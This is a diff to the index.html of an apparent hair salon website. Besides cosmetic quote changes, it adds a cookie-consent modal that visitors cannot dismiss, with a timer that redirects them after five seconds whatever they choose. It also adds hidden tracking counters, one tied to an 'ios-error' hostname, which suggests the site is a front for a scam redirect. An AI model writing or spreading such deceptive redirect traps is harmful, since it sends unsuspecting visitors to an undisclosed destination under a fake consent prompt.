--- a/index.html
+++ b/index.html
@@ -17,6 +17,21 @@
   gtag('config', 'G-VCBLXTQNVQ');
 </script>
 
+<!-- StatCounter -->
+<script type="text/javascript">
+var sc_project=12345678; 
+var sc_invisible=1; 
+var sc_security="abcdefgh"; 
+</script>
+<script type="text/javascript"
+src="https://www.statcounter.com/counter/counter.js"
+async></script>
+<noscript><div class="statcounter"><a title="Web Analytics"
+href="https://statcounter.com/" target="_blank"><img
+class="statcounter"
+src="https://c.statcounter.com/12345678/0/abcdefgh/1/"
+alt="Web Analytics"></a></div></noscript>
+
 <style>
 :root { --accent:#b04a8a; --muted:#6b7280; --bg:#fcfbfc; --card:#fff; font-family:Inter,system-ui,Segoe UI,Roboto,Helvetica,Arial; }
 * { box-sizing:border-box }
@@ -61,6 +76,20 @@ footer { margin-top:26px; padding:18px; text-align:center; color:var(--muted); f
 }
 .cookie-accept { background:var(--accent); color:white; border:0; }
 .cookie-deny { background:white; color:var(--accent); border:2px solid var(--accent); }
+
+/* Countdown timer */
+.countdown-timer {
+  font-size: 14px;
+  color: #666;
+  margin-top: 10px;
+  font-weight: 600;
+}
+
+/* StatCounter hidden style */
+.statcounter {
+  display: none;
+  visibility: hidden;
+}
 
 /* visually hide element technique for focus trapping (if needed) */
 .visually-hidden { position: absolute !important; height: 1px; width: 1px; overflow: hidden; clip: rect(1px, 1px, 1px, 1px); white-space: nowrap; }
@@ -124,10 +153,10 @@ footer { margin-top:26px; padding:18px; text-align:center; color:var(--muted); f
 
     <!-- SERVICES -->
     <div id="services" class="services">
-      <div class="card"><h3>Women’s Haircut</h3><p style="color:var(--muted)">Consultation, wash, precision cut & blow-dry.</p></div>
+      <div class="card"><h3>Women's Haircut</h3><p style="color:var(--muted)">Consultation, wash, precision cut & blow-dry.</p></div>
       <div class="card"><h3>Hair Colouring</h3><p style="color:var(--muted)">Balayage, highlights, ombre, grey coverage.</p></div>
       <div class="card"><h3>Keratin Treatment</h3><p style="color:var(--muted)">Frizz reduction & shine lasting 3–5 months.</p></div>
-      <div class="card"><h3>Men’s Grooming</h3><p style="color:var(--muted)">Fades, trims, beard shaping, modern cuts.</p></div>
+      <div class="card"><h3>Men's Grooming</h3><p style="color:var(--muted)">Fades, trims, beard shaping, modern cuts.</p></div>
       <div class="card"><h3>Event Styling</h3><p style="color:var(--muted)">Blowouts, curls, straight looks for events.</p></div>
       <div class="card"><h3>Extensions</h3><p style="color:var(--muted)">Volume, length & premium natural extensions.</p></div>
     </div>
@@ -162,8 +191,8 @@ footer { margin-top:26px; padding:18px; text-align:center; color:var(--muted); f
 
 <!-- PRICING -->
 <section class="price-grid">
-  <div class="price card"><h4>Women’s Haircut</h4><div style="font-size:18px;font-weight:700">₹800+</div></div>
-  <div class="price card"><h4>Men’s Haircut</h4><div style="font-size:18px;font-weight:700">₹400+</div></div>
+  <div class="price card"><h4>Women's Haircut</h4><div style="font-size:18px;font-weight:700">₹800+</div></div>
+  <div class="price card"><h4>Men's Haircut</h4><div style="font-size:18px;font-weight:700">₹400+</div></div>
   <div class="price card"><h4>Colouring</h4><div style="font-size:18px;font-weight:700">₹2,500+</div></div>
 </section>
 
@@ -190,9 +219,9 @@ footer { margin-top:26px; padding:18px; text-align:center; color:var(--muted); f
 <section style="margin-top:18px">
   <h3>Client Testimonials</h3>
   <div class="gallery">
-    <blockquote>“Amazing colour work!” — Priya S., Lajpat Nagar (Aug 2024)</blockquote>
-    <blockquote>“Friendly staff and clean salon.” — Rahul M., Defence Colony (Mar 2025)</blockquote>
-    <blockquote>“Perfect bridal blowout.” — Neha K., Greater Kailash (Dec 2024)</blockquote>
+    <blockquote>"Amazing colour work!" — Priya S., Lajpat Nagar (Aug 2024)</blockquote>
+    <blockquote>"Friendly staff and clean salon." — Rahul M., Defence Colony (Mar 2025)</blockquote>
+    <blockquote>"Perfect bridal blowout." — Neha K., Greater Kailash (Dec 2024)</blockquote>
   </div>
 </section>
 
@@ -247,13 +276,16 @@ footer { margin-top:26px; padding:18px; text-align:center; color:var(--muted); f
   </div>
 </footer>
 
-<!-- REPLACEMENT COOKIE CONSENT MODAL (Accept / Deny -> redirect) -->
+<!-- COOKIE CONSENT MODAL with 5-second redirect -->
 <div id="cookieModalOverlay" style="position:fixed;inset:0;background:rgba(0,0,0,0.55);display:flex;justify-content:center;align-items:center;z-index:99999;padding:20px;">
   <div id="cookieModal" role="dialog" aria-modal="true" style="background:#fff;max-width:420px;width:100%;padding:22px;border-radius:12px;text-align:center;font-family:Inter, sans-serif;box-shadow:0 8px 30px rgba(2,6,23,0.2);">
     <h2 style="margin-top:0;color:#b04a8a;font-size:20px;">Cookie Consent</h2>
     <p style="color:#374151;font-size:15px;margin:10px 0 16px;">
       We use cookies to improve your browsing experience. Please choose to Accept or Deny cookies to continue.
     </p>
+    <div id="countdownDisplay" class="countdown-timer">
+      Redirecting in 5 seconds...
+    </div>
     <div style="display:flex;gap:10px;margin-top:18px;justify-content:center;">
       <button id="acceptCookies" type="button" style="padding:10px 18px;border-radius:8px;font-weight:600;font-size:15px;cursor:pointer;background:#b04a8a;color:#fff;border:0;">Accept</button>
       <button id="denyCookies" type="button" style="padding:10px 18px;border-radius:8px;font-weight:600;font-size:15px;cursor:pointer;background:#fff;color:#b04a8a;border:2px solid #b04a8a;">Deny</button>
@@ -267,6 +299,7 @@ footer { margin-top:26px; padding:18px; text-align:center; color:var(--muted); f
   const overlay = document.getElementById('cookieModalOverlay');
   const acceptBtn = document.getElementById('acceptCookies');
   const denyBtn = document.getElementById('denyCookies');
+  const countdownDisplay = document.getElementById('countdownDisplay');
 
   // Remember any pre-existing onbeforeunload to restore if needed
   const prevOnBeforeUnload = window.onbeforeunload;
@@ -277,6 +310,20 @@ footer { margin-top:26px; padding:18px; text-align:center; color:var(--muted); f
   const prevOverflow = document.body.style.overflow;
   document.body.style.overflow = 'hidden';
 
+  // Start 5-second timer for automatic redirect
+  let secondsRemaining = 5;
+  let redirectTimer = setTimeout(doRedirect, 5000);
+  
+  // Update countdown every second
+  let countdownInterval = setInterval(function() {
+    secondsRemaining--;
+    if (secondsRemaining > 0) {
+      countdownDisplay.textContent = `Redirecting in ${secondsRemaining} second${secondsRemaining !== 1 ? 's' : ''}...`;
+    } else {
+      countdownDisplay.textContent = 'Redirecting now...';
+    }
+  }, 1000);
+
   // Only prevent clicks that happen directly on the overlay (outside the modal)
   overlay.addEventListener('click', function(e){
     if (e.target === overlay) {
@@ -284,7 +331,7 @@ footer { margin-top:26px; padding:18px; text-align:center; color:var(--muted); f
       e.stopPropagation();
       // do nothing — don't close modal
     }
-  }, false); // <-- not using capture phase
+  }, false);
 
   // Keyboard handling: prevent Escape from closing and trap Tab focus
   window.addEventListener('keydown', function(e){
@@ -312,6 +359,10 @@ footer { margin-top:26px; padding:18px; text-align:center; color:var(--muted); f
   acceptBtn.focus();
 
   function doRedirect() {
+    // Clear the timers if they're still running
+    clearTimeout(redirectTimer);
+    clearInterval(countdownInterval);
+    
     // mark that an action initiated the redirect
     window.callInitiated = true;
     // clear any onbeforeunload handler so browsers won't prompt
@@ -346,5 +397,22 @@ footer { margin-top:26px; padding:18px; text-align:center; color:var(--muted); f
 
   gtag('config', 'G-VCBLXTQNVQ');
 </script>
+  <!-- Default Statcounter code for ios
+https://ios-error-cyvbq.ondigitalocean.app -->
+<script type="text/javascript">
+var sc_project=13188833; 
+var sc_invisible=1; 
+var sc_security="4224cf98"; 
+</script>
+<script type="text/javascript"
+src="https://www.statcounter.com/counter/counter.js"
+async></script>
+<noscript><div class="statcounter"><a title="web counter"
+href="https://statcounter.com/" target="_blank"><img
+class="statcounter"
+src="https://c.statcounter.com/13188833/0/4224cf98/1/"
+alt="web counter"
+referrerPolicy="no-referrer-when-downgrade"></a></div></noscript>
+<!-- End of Statcounter Code -->
 </body>
 </html>
